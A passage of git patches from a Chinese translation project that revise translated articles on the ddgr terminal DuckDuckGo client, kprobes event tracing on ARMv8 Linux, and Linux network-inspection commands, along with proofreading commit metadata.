-* Minimal dependencies +* 极少的依赖项 -You can download `ddgr` for various systems direct from the Github project page: -[Download ‘ddgr’ from Github][9] +你可以从 Github 的项目页面上下载支持各种系统的 `ddgr`: -You can also install ddgr on Ubuntu 16.04 LTS and up from a PPA. This repo is maintained by the developer of ddgr and is recommended should you want to stay up-to-date with new releases as and when they appear. +[从 Github 下载 “ddgr”][9] -Do note that at the time of writing the latest version of ddgr is  _not_  in the PPA, but an older version (lacking –num support) is: +另外,在 Ubuntu 16.04 LTS 或更新版本中,你可以使用 PPA 安装 ddgr。这个仓库由 ddgr 的开发者维护。如果你想要保持在最新版本的话,推荐使用这种方式安装。 + +需要提醒的是,在本文创作时,这个 PPA 中的 ddgr _并不是_ 最新版本,而是一个稍旧的版本(缺少 -num 选项)。 + +使用以下命令添加 PPA: ``` sudo add-apt-repository ppa:twodopeshaggy/jarun @@ -49,33 +52,34 @@ sudo add-apt-repository ppa:twodopeshaggy/jarun sudo apt-get update ``` -### How To Use ddgr to Search DuckDuckGo from the Comand Line +### 如何使用 ddgr 在命令行中搜索 DuckDuckGo -To use ddgr once you installed all you need to do is pop open your terminal emulator of choice and run: +安装完毕后,你只需打开你的终端模拟器,并运行: ``` ddgr ``` -Next enter a search term: +然后输入查询内容: ``` search-term ``` -To limit the number of results returned run: +你可以限制搜索结果数: ``` ddgr --num 5 search-term ``` -To instantly open the first matching result for a search term in your browser run: +或者自动在浏览器中打开第一条搜索结果: + ``` ddgr -j search-term ``` -You can pass arguments and flags to narrow down your search. To see a comprehensive list inside the terminal run: +你可以使用参数和选项来提高搜索精确度。使用以下命令来查看所有的参数: ``` ddgr -h @@ -85,8 +89,8 @@ ddgr -h via: http://www.omgubuntu.co.uk/2017/11/duck-duck-go-terminal-app -作者:[JOEY SNEDDON ][a] -译者:[译者ID](https://github.com/译者ID) +作者:[JOEY SNEDDON][a] +译者:[yixunx](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 9a601d06963fbabdac4f21d56945081da2ed1209 Mon Sep 17 00:00:00 2001 From: Yixun Xu Date: Thu, 30 Nov 2017 16:43:08 -0500 Subject: [PATCH 0099/1627] move to translated --- .../tech/20171130 Search DuckDuckGo from the Command Line.md | 2 -- 1 file changed, 2 deletions(-) rename {sources => translated}/tech/20171130 Search DuckDuckGo from the Command Line.md (99%) diff --git a/sources/tech/20171130 Search DuckDuckGo from the Command Line.md b/translated/tech/20171130 Search DuckDuckGo from the Command Line.md similarity index 99% rename from sources/tech/20171130 Search DuckDuckGo from the Command Line.md rename to translated/tech/20171130 Search DuckDuckGo from the Command Line.md index 259a8d7248..e4c47b691b 100644 --- a/sources/tech/20171130 Search DuckDuckGo from the Command Line.md +++ b/translated/tech/20171130 Search DuckDuckGo from the Command Line.md @@ -1,5 +1,3 @@ -yixunx translating - # 在命令行中使用DuckDuckGo搜索 ![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/duckduckgo.png) From 594e7865a7022ccca2b62302de7ac29f984f973f Mon Sep 17 00:00:00 2001 From: Yixun Xu Date: Thu, 30 Nov 2017 16:45:01 -0500 Subject: [PATCH 0100/1627] fix github link --- .../tech/20171130 Search DuckDuckGo from the Command Line.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20171130 Search DuckDuckGo from the Command Line.md b/translated/tech/20171130 Search DuckDuckGo from the Command Line.md index e4c47b691b..9bf96ecb88 100644 --- a/translated/tech/20171130 Search DuckDuckGo from the Command Line.md +++ b/translated/tech/20171130 Search DuckDuckGo from the Command Line.md @@ -88,7 +88,7 @@ ddgr -h via: http://www.omgubuntu.co.uk/2017/11/duck-duck-go-terminal-app 作者:[JOEY SNEDDON][a] -译者:[yixunx](https://github.com/译者ID) +译者:[yixunx](https://github.com/yixunx) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 2ba1eeda720207e3cbda7afc35eb98b5c508d9c2 Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 30 Nov 2017 21:51:35 +0800 Subject: [PATCH 0101/1627] PRF:20161216 Kprobes Event Tracing on ARMv8.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @kimii 翻译的很好,这篇很专业。 --- ...20161216 Kprobes Event Tracing on ARMv8.md | 142 +++++++++--------- 1 file changed, 68 insertions(+), 74 deletions(-) diff --git a/translated/tech/20161216 Kprobes Event Tracing on ARMv8.md b/translated/tech/20161216 Kprobes Event Tracing on ARMv8.md index d4edaf76bd..3c3ab0de5b 100644 --- a/translated/tech/20161216 Kprobes Event Tracing on ARMv8.md +++ b/translated/tech/20161216 Kprobes Event Tracing on ARMv8.md @@ -1,86 +1,82 @@ -# Kprobes Event Tracing on ARMv8 +ARMv8 上的 kprobes 事件跟踪 +============== ![core-dump](http://www.linaro.org/wp-content/uploads/2016/02/core-dump.png) ### 介绍 -Kprobes 是一种内核功能,它允许通过在执行(或模拟)断点指令之前和之后,设置调用开发者提供例程的任意断点来检测内核。可参见 kprobes 文档[[1]][2] 获取更多信息。基本的 kprobes 功能可使用 CONFIG_KPROBEES 来选择。在 arm64 的 v4.8 发行版中, kprobes 支持被添加到主线。 +kprobes 是一种内核功能,它允许通过在执行(或模拟)断点指令之前和之后,设置调用开发者提供例程的任意断点来检测内核。可参见 kprobes 文档^注1 获取更多信息。基本的 kprobes 功能可使用 `CONFIG_KPROBEES` 来选择。在 arm64 的 v4.8 内核发行版中, kprobes 支持被添加到主线。 -在这篇文章中,我们将介绍 kprobes 在 arm64 上的使用,通过在命令行中使用 debugfs 事件追踪接口来收集动态追踪事件。这个功能在一些架构(包括 arm32)上可用已经有段时间,现在在 arm64 上也能使用了。这个功能允许使用 kprobes 而无需编写任何代码。 +在这篇文章中,我们将介绍 kprobes 在 arm64 上的使用,通过在命令行中使用 debugfs 事件追踪接口来收集动态追踪事件。这个功能在一些架构(包括 arm32)上可用已经有段时间,现在在 arm64 上也能使用了。这个功能可以无需编写任何代码就能使用 kprobes。 ### 探针类型 -Kprbes 子系统提供了三种不同类型的动态探针,如下所述。 +kprobes 子系统提供了三种不同类型的动态探针,如下所述。 -### Kprobes +#### kprobes -基本探针是 kprobes 插入的一个软件断点,用以替代你正在探测的指令,当探测点被击中时,它为最终的单步执行(或模拟)保存下原始指令。 +基本探针是 kprobes 插入的一个软件断点,用以替代你正在探测的指令,当探测点被命中时,它为最终的单步执行(或模拟)保存下原始指令。 -### Kretprobes +#### kretprobes -Kretprobes 是 kprobes 的一部分,它允许拦截返回函数,而不必在返回点设置一个探针(或者可能有多个)。对于支持的架构(包括 ARMv8),只要选择 kprobes,就可以选择此功能。 +kretprobes 是 kprobes 的一部分,它允许拦截返回函数,而不必在返回点设置一个探针(或者可能有多个探针)。对于支持的架构(包括 ARMv8),只要选择 kprobes,就可以选择此功能。 -### Jprobes +#### jprobes -Jprobes 允许通过提供一个具有相同调用签名(call signature)的中间函数来拦截对一个函数的调用,这里中间函数将被首先调用。Jprobes 只是一个编程接口,它不能通过 debugfs 事件追踪子系统来使用。因此,我们将不会在这里进一步讨论 jprobes。如果你想使用 jprobes,请参考 kprobes 文档。 +jprobes 允许通过提供一个具有相同调用签名call signature的中间函数来拦截对一个函数的调用,这里中间函数将被首先调用。jprobes 只是一个编程接口,它不能通过 debugfs 事件追踪子系统来使用。因此,我们将不会在这里进一步讨论 jprobes。如果你想使用 jprobes,请参考 kprobes 文档。 -### 调用 Kprobes +### 调用 kprobes -Kprobes 提供一系列能从内核代码中调用的 API 来设置探测点和当探测点被击中时调用的注册函数。在不往内核中添加代码的情况下,Kprobes 也是可用的,这是通过写入特定事件追踪的 debugfs 文件来实现的,需要在文件中设置探针地址和信息,以便在探针被击中时记录到追踪日志中。后者是本文将要讨论的重点。最后 Kprobes 可以通过 perl 命令来使用。 +kprobes 提供一系列能从内核代码中调用的 API 来设置探测点和当探测点被命中时调用的注册函数。在不往内核中添加代码的情况下,kprobes 也是可用的,这是通过写入特定事件追踪的 debugfs 文件来实现的,需要在文件中设置探针地址和信息,以便在探针被命中时记录到追踪日志中。后者是本文将要讨论的重点。最后 kprobes 可以通过 perl 命令来使用。 -### Kprobes API +### kprobes API 内核开发人员可以在内核中编写函数(通常在专用的调试模块中完成)来设置探测点,并且在探测指令执行前和执行后立即执行任何所需操作。这在 kprobes.txt 中有很好的解释。 ### 事件追踪 -事件追踪子系统有自己的自己的文档[[2]][3],对于了解一般追踪事件的背景可能值得一读。事件追踪子系统是追踪点(tracepoints)和 kprobes 事件追踪的基础。事件追踪文档重点关注追踪点,所以请在查阅文档时记住这一点。Kprobes 与追踪点不同的是没有预定义的追踪点列表,而是采用动态创建的用于触发追踪事件信息收集的任意探测点。事件追踪子系统通过一系列 debugfs 文件来控制和监视。事件追踪(CONFIG_EVENT_TRACING)将在被如 kprobe 事件追踪子系统等需要时自动选择。 +事件追踪子系统有自己的自己的文档^注2 ,对于了解一般追踪事件的背景可能值得一读。事件追踪子系统是追踪点tracepoints和 kprobes 事件追踪的基础。事件追踪文档重点关注追踪点,所以请在查阅文档时记住这一点。kprobes 与追踪点不同的是没有预定义的追踪点列表,而是采用动态创建的用于触发追踪事件信息收集的任意探测点。事件追踪子系统通过一系列 debugfs 文件来控制和监视。事件追踪(`CONFIG_EVENT_TRACING`)将在被如 kprobe 事件追踪子系统等需要时自动选择。 -#### Kprobes 事件 +#### kprobes 事件 -使用 kprobes 事件追踪子系统,用户可以在内核任意断点处指定要报告的信息,只需要指定任意现有可探测指令的地址以及格式化信息即可确定。在执行过程中遇到断点时,kprobes 将所请求的信息传递给事件追踪子系统的公共部分,这些部分将数据格式化并追加到追踪日志中,就像追踪点的工作方式一样。Kprobes 使用一个类似的但是大部分是独立的 debugfs 文件来控制和显示追踪事件信息。该功能可使用 CONFIG_KPROBE_EVENT 来选择。Kprobetrace文档[[3]][4] 提供了如何使用 kprobes 事件追踪的基本信息,并且应当被参考用以了解以下介绍示例的详细信息。 +使用 kprobes 事件追踪子系统,用户可以在内核任意断点处指定要报告的信息,只需要指定任意现有可探测指令的地址以及格式化信息即可确定。在执行过程中遇到断点时,kprobes 将所请求的信息传递给事件追踪子系统的公共部分,这些部分将数据格式化并追加到追踪日志中,就像追踪点的工作方式一样。kprobes 使用一个类似的但是大部分是独立的 debugfs 文件来控制和显示追踪事件信息。该功能可使用 `CONFIG_KPROBE_EVENT` 来选择。Kprobetrace 文档^ 注3 提供了如何使用 kprobes 事件追踪的基本信息,并且应当被参考用以了解以下介绍示例的详细信息。 -### Kprobes 和 Perf +### kprobes 和 perf -Perf 工具为 Kprobes 提供了另一个命令行接口。特别地,“perf probe” 允许探测点除了由函数名加偏移量和地址指定外,还可由源文件和行号指定。Perf 接口实际上是使用 kprobes 的 debugfs 接口的封装器。 +perf 工具为 kprobes 提供了另一个命令行接口。特别地,`perf probe` 允许探测点除了由函数名加偏移量和地址指定外,还可由源文件和行号指定。perf 接口实际上是使用 kprobes 的 debugfs 接口的封装器。 -### Arm64 Kprobes +### Arm64 kprobes 上述所有 kprobes 的方面现在都在 arm64 上得到实现,然而实际上与其它架构上的有一些不同: * 注册名称参数当然是依架构而特定的,并且可以在 ARM ARM 中找到。 - -* 目前不是所有的指令类型都可被探测。当前不可探测的指令包括 mrs/msr(除了 DAIF 读),异常生成指令,eret 和 hint(除了 nop 变体)。在这些情况下,只探测一个附近的指令来代替是最简单的。这些指令在探测的黑名单里是因为在 kprobes 单步执行或者指令模拟时它们对处理器状态造成的改变是不安全的,这是由于 kprobes 构造的单步执行上下文和指令所需要的不一致,或者是由于指令不能容忍在 kprobes 中额外的处理时间和异常处理(ldx/stx)。 - +* 目前不是所有的指令类型都可被探测。当前不可探测的指令包括 mrs/msr(除了 DAIF 读取)、异常生成指令、eret 和 hint(除了 nop 变体)。在这些情况下,只探测一个附近的指令来代替是最简单的。这些指令在探测的黑名单里是因为在 kprobes 单步执行或者指令模拟时它们对处理器状态造成的改变是不安全的,这是由于 kprobes 构造的单步执行上下文和指令所需要的不一致,或者是由于指令不能容忍在 kprobes 中额外的处理时间和异常处理(ldx/stx)。 * 试图识别在 ldx/stx 序列中的指令并且防止探测,但是理论上这种检查可能会失败,导致允许探测到的原子序列永远不会成功。当探测原子代码序列附近时应该小心。 - * 注意由于 linux ARM64 调用约定的具体信息,为探测函数可靠地复制栈帧是不可能的,基于此不要试图用 jprobes 这样做,这一点与支持 jprobes 的大多数其它架构不同。这样的原因是被调用者没有足够的信息来确定需要的栈数量。 - -* 注意当探针被击中时,一个探针记录的栈指针信息将反映出使用中的特定栈指针,它是内核栈指针或者中断栈指针。 - +* 注意当探针被命中时,一个探针记录的栈指针信息将反映出使用中的特定栈指针,它是内核栈指针或者中断栈指针。 * 有一组内核函数是不能被探测的,通常因为它们作为 kprobes 处理的一部分被调用。这组函数的一部分是依架构特定的,并且也包含如异常入口代码等。 -### 使用 Kprobes 事件追踪 +### 使用 kprobes 事件追踪 -Kprobes 一个常用的例子是检测函数入口和/或出口。因为只需要使用函数名来作为探针地址,它安装探针特别简单。Kprobes 事件追踪将查看符号名称并且确定地址。ARMv8 调用标准定义了函数参数和返回值的位置,并且这些可以作为 kprobes 事件处理的一部分被打印出来。 +kprobes 的一个常用例子是检测函数入口和/或出口。因为只需要使用函数名来作为探针地址,它安装探针特别简单。kprobes 事件追踪将查看符号名称并且确定地址。ARMv8 调用标准定义了函数参数和返回值的位置,并且这些可以作为 kprobes 事件处理的一部分被打印出来。 ### 例子: 函数入口探测 检测 USB 以太网驱动程序复位功能: ``` -_$ pwd +$ pwd /sys/kernel/debug/tracing $ cat > kprobe_events < events/kprobes/enable_ +$ echo 1 > events/kprobes/enable ``` -此时每次驱动器的 *ax8872_reset()* 函数被调用,追踪事件都将会被记录。这个事件将显示指向通过 作为此函数的唯一参数的 X0(按照 ARMv8 调用标准)传入的 _usbnet_ 结构的指针。插入需要以太网驱动程序的USB加密狗后,我们看见以下追踪信息: +此时每次该驱动的 `ax8872_reset()` 函数被调用,追踪事件都将会被记录。这个事件将显示指向通过作为此函数的唯一参数的 `X0`(按照 ARMv8 调用标准)传入的 `usbnet` 结构的指针。插入需要以太网驱动程序的 USB 加密狗后,我们看见以下追踪信息: ``` -_$ cat trace +$ cat trace # tracer: nop # # entries-in-buffer/entries-written: 1/1 #P:8 @@ -93,27 +89,27 @@ _$ cat trace # TASK-PID CPU# |||| TIMESTAMP FUNCTION # | | | |||| | | kworker/0:0-4 [000] d… 10972.102939: p_ax88772_reset_0: -(ax88772_reset+0x0/0x230) arg1=0xffff800064824c80_ +(ax88772_reset+0x0/0x230) arg1=0xffff800064824c80 ``` -这里我们可以看见传入到我们的探测函数的指针参数的值。由于我们没有使用 kprobes 事件追踪的可选标签功能,我们需要的信息自动被标注为 _arg1_。注意这个指向我们需要 kprobes 记录这个探针的一组值的第一个,而不是函数参数的实际位置。在这个例子中它也只是碰巧是我们探测函数的第一个参数。 +这里我们可以看见传入到我们的探测函数的指针参数的值。由于我们没有使用 kprobes 事件追踪的可选标签功能,我们需要的信息自动被标注为 `arg1`。注意这指向我们需要 kprobes 记录这个探针的一组值的第一个,而不是函数参数的实际位置。在这个例子中它也只是碰巧是我们探测函数的第一个参数。 ### 例子: 函数入口和返回探测 -Kretprobe 功能专门用于探测函数返回。在函数入口 kprobes 子系统将会被调用并且建立钩子以便在函数返回时调用,钩子将记录需求事件信息。对最常见情况,返回信息通常在 X0 寄存器中,这是非常有用的。在 %x0 中返回值也可以被称为 _$retval_。以下例子也演示了如何提供一个可读的标签来展示有趣的信息。 +kretprobe 功能专门用于探测函数返回。在函数入口 kprobes 子系统将会被调用并且建立钩子以便在函数返回时调用,钩子将记录需求事件信息。对最常见情况,返回信息通常在 `X0` 寄存器中,这是非常有用的。在 `%x0` 中返回值也可以被称为 `$retval`。以下例子也演示了如何提供一个可读的标签来展示有趣的信息。 -使用 kprobes 和 kretprobe 检测内核 *_do_fork()* 函数来记录参数和结果的例子: +使用 kprobes 和 kretprobe 检测内核 `do_fork()` 函数来记录参数和结果的例子: ``` -_$ cd /sys/kernel/debug/tracing +$ cd /sys/kernel/debug/tracing $ cat > kprobe_events < events/kprobes/enable_ +$ echo 1 > events/kprobes/enable ``` -此时每次对 _do_fork() 的调用都会产生两个记录到 “_trace_” 文件的 kprobe 事件,一个报告调用参数值,另一个报告返回值。返回值在 trace 文件中将被标记为“_pid_”。这里是三次 fork 系统调用执行后的 trace 文件的内容: +此时每次对 `_do_fork()` 的调用都会产生两个记录到 trace 文件的 kprobe 事件,一个报告调用参数值,另一个报告返回值。返回值在 trace 文件中将被标记为 `pid`。这里是三次 fork 系统调用执行后的 trace 文件的内容: ``` _$ cat trace @@ -143,23 +139,23 @@ _$ cat trace 检测 `_do_wait()` 函数: ``` -_$ cat > kprobe_events < kprobe_events < events/kprobes/enable_ +$ echo 1 > events/kprobes/enable ``` -注意在第一个探针中使用的参数标签是可选的,并且可用于更清晰地识别记录在追踪日志中的信息。带符号的偏移量和括号表明了寄存器参数是指向记录在追踪日志中的内存内容的指针。“_:u32_”表明了内存位置包含一个无符号的4字节宽的数据(在这个例子中指局部定义的结构中的一个 emum 和一个 int) +注意在第一个探针中使用的参数标签是可选的,并且可用于更清晰地识别记录在追踪日志中的信息。带符号的偏移量和括号表明了寄存器参数是指向记录在追踪日志中的内存内容的指针。`:u32` 表明了内存位置包含一个无符号的 4 字节宽的数据(在这个例子中指局部定义的结构中的一个 emum 和一个 int)。 探针标签(冒号后)是可选的,并且将用来识别日志中的探针。对每个探针来说标签必须是独一无二的。如果没有指定,将从附近的符号名称自动生成一个有用的标签,如前面的例子所示。 -也要注意“_$retval_”参数可以只是指定为“_%x0_”。 +也要注意 `$retval` 参数可以只是指定为 `%x0`。 -这里是两次 fork 系统调用执行后的 “_trace_” 文件的内容: +这里是两次 fork 系统调用执行后的 trace 文件的内容: ``` -_$ cat trace +$ cat trace # tracer: nop # # entries-in-buffer/entries-written: 4/4 #P:8 @@ -174,23 +170,23 @@ _$ cat trace bash-1702 [001] d… 175.342074: wait_p: (do_wait+0x0/0x260) wo_type=0x3 wo_flags=0xe bash-1702 [002] d..1 175.347236: wait_r: (SyS_wait4+0x74/0xe4 <- do_wait) arg1=0x757 bash-1702 [002] d… 175.347337: wait_p: (do_wait+0x0/0x260) wo_type=0x3 wo_flags=0xf - bash-1702 [002] d..1 175.347349: wait_r: (SyS_wait4+0x74/0xe4 <- do_wait) arg1=0xfffffffffffffff6_ + bash-1702 [002] d..1 175.347349: wait_r: (SyS_wait4+0x74/0xe4 <- do_wait) arg1=0xfffffffffffffff6 ``` ### 例子: 探测任意指令地址 -在前面的例子中,我们已经为函数的入口和出口插入探针,然而探测一个任意指令(除少数例外)是可能的。如果我们正在 C 函数中放置一个探针,第一步是查看代码的汇编版本以确定我们要放置探针的位置。一种方法是在 vmlinux 文件上使用 gdb,并在要放置探针的函数中展示指令。下面是一个在 arch/arm64/kernel/modules.c 中 _module_alloc_ 函数执行此操作的示例。在这种情况下,因为 gdb 似乎更喜欢使用弱符号定义,并且它是与这个函数关联的存根代码,所以我们从 System.map 中来获取符号值: +在前面的例子中,我们已经为函数的入口和出口插入探针,然而探测一个任意指令(除少数例外)是可能的。如果我们正在 C 函数中放置一个探针,第一步是查看代码的汇编版本以确定我们要放置探针的位置。一种方法是在 vmlinux 文件上使用 gdb,并在要放置探针的函数中展示指令。下面是一个在 `arch/arm64/kernel/modules.c` 中 `module_alloc` 函数执行此操作的示例。在这种情况下,因为 gdb 似乎更喜欢使用弱符号定义,并且它是与这个函数关联的存根代码,所以我们从 System.map 中来获取符号值: ``` -_$ grep module_alloc System.map +$ grep module_alloc System.map ffff2000080951c4 T module_alloc -ffff200008297770 T kasan_module_alloc_ +ffff200008297770 T kasan_module_alloc ``` 在这个例子中我们使用了交叉开发工具,并且在我们的主机系统上调用 gdb 来检查指令包含我们感兴趣函数。 ``` -_$ ${CROSS_COMPILE}gdb vmlinux +$ ${CROSS_COMPILE}gdb vmlinux (gdb) x/30i 0xffff2000080951c4 0xffff2000080951c4 : sub sp, sp, #0x30 0xffff2000080951c8 : adrp x3, 0xffff200008d70000 @@ -218,37 +214,37 @@ _$ ${CROSS_COMPILE}gdb vmlinux 0xffff200008095228 : ldp x19, x20, [sp,#16] 0xffff20000809522c : ldp x29, x30, [sp],#32 0xffff200008095230 : ret 0xffff200008095234 : mov sp, x29 - 0xffff200008095238 : mov x19, #0x0 // #0_ + 0xffff200008095238 : mov x19, #0x0 // #0 ``` 在这种情况下,我们将在此函数中显示以下源代码行的结果: ``` -_p = __vmalloc_node_range(size, MODULE_ALIGN, VMALLOC_START, +p = __vmalloc_node_range(size, MODULE_ALIGN, VMALLOC_START, VMALLOC_END, GFP_KERNEL, PAGE_KERNEL_EXEC, 0, -NUMA_NO_NODE, __builtin_return_address(0));_ +NUMA_NO_NODE, __builtin_return_address(0)); ``` -…以及在此代码行的函数调用的返回值: +……以及在此代码行的函数调用的返回值: ``` -_if (p && (kasan_module_alloc(p, size) < 0)) {_ +if (p && (kasan_module_alloc(p, size) < 0)) { ``` -我们可以在从调用外部函数的汇编代码中识别这些。为了展示这些值,我们将在目标系统上的0xffff20000809520c 和 0xffff20000809521c 处放置探针。 +我们可以在从调用外部函数的汇编代码中识别这些。为了展示这些值,我们将在目标系统上的 `0xffff20000809520c` 和 `0xffff20000809521c` 处放置探针。 ``` -_$ cat > kprobe_events < kprobe_events < events/kprobes/enable_ +$ echo 1 > events/kprobes/enable ``` 现在将一个以太网适配器加密狗插入到 USB 端口后,我们看到以下写入追踪日志的内容: ``` -_$ cat trace +$ cat trace # tracer: nop # # entries-in-buffer/entries-written: 12/12 #P:8 @@ -271,47 +267,45 @@ _$ cat trace modprobe-2097 [002] d… 78.030643: p_0xffff20000809520c: (module_alloc+0x48/0x98) arg1=0xffff2000011b8000 modprobe-2097 [002] d… 78.030761: p_0xffff20000809521c: (module_alloc+0x58/0x98) arg1=0x0 modprobe-2097 [002] d… 78.031132: p_0xffff20000809520c: (module_alloc+0x48/0x98) arg1=0xffff200001270000 - modprobe-2097 [002] d… 78.031187: p_0xffff20000809521c: (module_alloc+0x58/0x98) arg1=0x0_ + modprobe-2097 [002] d… 78.031187: p_0xffff20000809521c: (module_alloc+0x58/0x98) arg1=0x0 ``` -Kprobes 事件系统的另一个功能是记录统计信息,这可在 inkprobe_profile 中找到。在以上追踪后,该文件的内容为: +kprobes 事件系统的另一个功能是记录统计信息,这可在 `inkprobe_profile` 中找到。在以上追踪后,该文件的内容为: ``` -_$ cat kprobe_profile +$ cat kprobe_profile p_0xffff20000809520c 6 0 -p_0xffff20000809521c 6 0_ +p_0xffff20000809521c 6 0 ``` -这表明我们设置的两处断点每个共发生了 8 次击中,这当然与追踪日志数据是一致的。在 kprobetrace 文档中有更多 kprobe_profile 的功能描述。 +这表明我们设置的两处断点每个共发生了 8 次命中,这当然与追踪日志数据是一致的。在 kprobetrace 文档中有更多 kprobe_profile 的功能描述。 -也可以进一步过滤 kprobes 事件。用来控制这点的 debugfs 文件在 kprobetrace 文档中被列出,然而他们内容的详细信息大多在 trace events 文档中被描述。 +也可以进一步过滤 kprobes 事件。用来控制这点的 debugfs 文件在 kprobetrace 文档中被列出,然而它们内容的详细信息大多在 trace events 文档中被描述。 ### 总结 -现在,Linux ARMv8 对支持 kprobes 功能也和其它架构相当。有人正在做添加 uprobes 和 systemtap 支持的工作。这些功能/工具和其他已经完成的功能(如: perf, coresight)允许 Linux ARMv8 用户像在其它更老的架构上一样调试和测试性能。 +现在,Linux ARMv8 对支持 kprobes 功能也和其它架构相当。有人正在做添加 uprobes 和 systemtap 支持的工作。这些功能/工具和其他已经完成的功能(如: perf、 coresight)允许 Linux ARMv8 用户像在其它更老的架构上一样调试和测试性能。 * * * 参考文献 -[[1]][5] Jim Keniston, Prasanna S. Panchamukhi, Masami Hiramatsu. “Kernel Probes (Kprobes).” _GitHub_. GitHub, Inc., 15 Aug. 2016\. Web. 13 Dec. 2016. - -[[2]][6] Ts’o, Theodore, Li Zefan, and Tom Zanussi. “Event Tracing.” _GitHub_. GitHub, Inc., 3 Mar. 2016\. Web. 13 Dec. 2016. - -[[3]][7] Hiramatsu, Masami. “Kprobe-based Event Tracing.” _GitHub_. GitHub, Inc., 18 Aug. 2016\. Web. 13 Dec. 2016. +- 注1: Jim Keniston, Prasanna S. Panchamukhi, Masami Hiramatsu. “Kernel Probes (kprobes).” _GitHub_. GitHub, Inc., 15 Aug. 2016\. Web. 13 Dec. 2016. +- 注2: Ts’o, Theodore, Li Zefan, and Tom Zanussi. “Event Tracing.” _GitHub_. GitHub, Inc., 3 Mar. 2016\. Web. 13 Dec. 2016. +- 注3: Hiramatsu, Masami. “Kprobe-based Event Tracing.” _GitHub_. GitHub, Inc., 18 Aug. 2016\. Web. 13 Dec. 2016. ---------------- -作者简介 : [David Long][8] David在 Linaro Kernel - Core Development 团队中担任工程师。 在加入 Linaro 之前,他在商业和国防行业工作了数年,既做嵌入式实时工作又为Unix提供软件开发工具。之后,在 Digital(又名 Compaq)公司工作了十几年,负责 Unix 标准,C 编译器和运行时库的工作。之后 David 又去了一系列初创公司做嵌入式 Linux 和安卓系统,嵌入式定制操作系统和 Xen 虚拟化。他拥有 MIPS,Alpha 和 ARM 平台的经验(等等)。他使用过从 1979 年贝尔实验室 V6 开始的大部分Unix操作系统,并且长期以来一直是 Linux 用户和倡导者。他偶尔也因使用烙铁和数字示波器调试设备驱动而知名。 +作者简介 : [David Long][8] 在 Linaro Kernel - Core Development 团队中担任工程师。 在加入 Linaro 之前,他在商业和国防行业工作了数年,既做嵌入式实时工作又为Unix提供软件开发工具。之后,在 Digital(又名 Compaq)公司工作了十几年,负责 Unix 标准,C 编译器和运行时库的工作。之后 David 又去了一系列初创公司做嵌入式 Linux 和安卓系统,嵌入式定制操作系统和 Xen 虚拟化。他拥有 MIPS,Alpha 和 ARM 平台的经验(等等)。他使用过从 1979 年贝尔实验室 V6 开始的大部分Unix操作系统,并且长期以来一直是 Linux 用户和倡导者。他偶尔也因使用烙铁和数字示波器调试设备驱动而知名。 -------------------------------------------------------------------------------- via: http://www.linaro.org/blog/kprobes-event-tracing-armv8/ -作者:[ David Long][a] +作者:[David Long][a] 译者:[kimii](https://github.com/kimii) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From c6f80c05eb03c8074a13d787f69535d2f639c4bb Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 30 Nov 2017 22:03:00 +0800 Subject: [PATCH 0102/1627] PRF:20171009 Examining network connections on Linux systems.md @geekpi --- ...ng network connections on Linux systems.md | 50 ++++++------------- 1 file changed, 16 insertions(+), 34 deletions(-) diff --git a/translated/tech/20171009 Examining network connections on Linux systems.md b/translated/tech/20171009 Examining network connections on Linux systems.md index 7fc95738e9..1676525e21 100644 --- a/translated/tech/20171009 Examining network connections on Linux systems.md +++ b/translated/tech/20171009 Examining network connections on Linux systems.md @@ -1,21 +1,20 @@ 检查 Linux 系统上的网络连接 ============================================================ -### Linux 系统提供了许多有用的命令来检查网络配置和连接。下面来看几个,包括 ifquery、ifup、ifdown 和 ifconfig。 - +> Linux 系统提供了许多有用的命令来检查网络配置和连接。下面来看几个,包括 `ifquery`、`ifup`、`ifdown` 和 `ifconfig`。 Linux 上有许多可用于查看网络设置和连接的命令。在今天的文章中,我们将会通过一些非常方便的命令来看看它们是如何工作的。 ### ifquery 命令 -一个非常有用的命令是 **ifquery**。这个命令应该会显示一个网络接口列表。但是,你可能只会看到类似这样的内容 - 仅显示回环接口: +一个非常有用的命令是 `ifquery`。这个命令应该会显示一个网络接口列表。但是,你可能只会看到类似这样的内容 - 仅显示回环接口: ``` $ ifquery --list lo ``` -如果是这种情况,那么你的 **/etc/network/interfaces** 不包括除了回环接口之外的网络接口信息。在下面的例子中,假设你使用 DHCP 来分配地址,且如果你希望它更有用的话,你可以添加例子最后的两行。 +如果是这种情况,那说明你的 `/etc/network/interfaces` 不包括除了回环接口之外的网络接口信息。在下面的例子中,假设你使用 DHCP 来分配地址,且如果你希望它更有用的话,你可以添加例子最后的两行。 ``` # interfaces(5) file used by ifup(8) and ifdown(8) @@ -27,14 +26,11 @@ iface eth0 inet dhcp ### ifup 和 ifdown 命令 -可以使用相关的 **ifup** 和 **ifdown** 命令来打开网络连接并根据需要将其关闭,只要该文件具有所需的描述性数据即可。请记住,“if” 在这里意思是“接口” (interface),这与 **ifconfig** 命令中的一样,而不是“如果我只有一个大脑” (if I only had a brain) 中的 “if”。 - - - +可以使用相关的 `ifup` 和 `ifdown` 命令来打开网络连接并根据需要将其关闭,只要该文件具有所需的描述性数据即可。请记住,“if” 在这里意思是接口interface,这与 `ifconfig` 命令中的一样,而不是如果我只有一个大脑if I only had a brain 中的 “if”。 ### ifconfig 命令 -另外,**ifconfig** 命令完全不读取 /etc/network/interfaces,但是在网络接口上仍然提供了相当多的有用信息 - 配置数据以及数据包计数可以告诉你每个接口有多忙。ifconfig 命令也可用于关闭和重新启动网络接口(例如:ifconfig eth0 down)。 +另外,`ifconfig` 命令完全不读取 `/etc/network/interfaces`,但是仍然提供了网络接口相当多的有用信息 —— 配置数据以及可以告诉你每个接口有多忙的数据包计数。`ifconfig` 命令也可用于关闭和重新启动网络接口(例如:`ifconfig eth0 down`)。 ``` $ ifconfig eth0 @@ -49,15 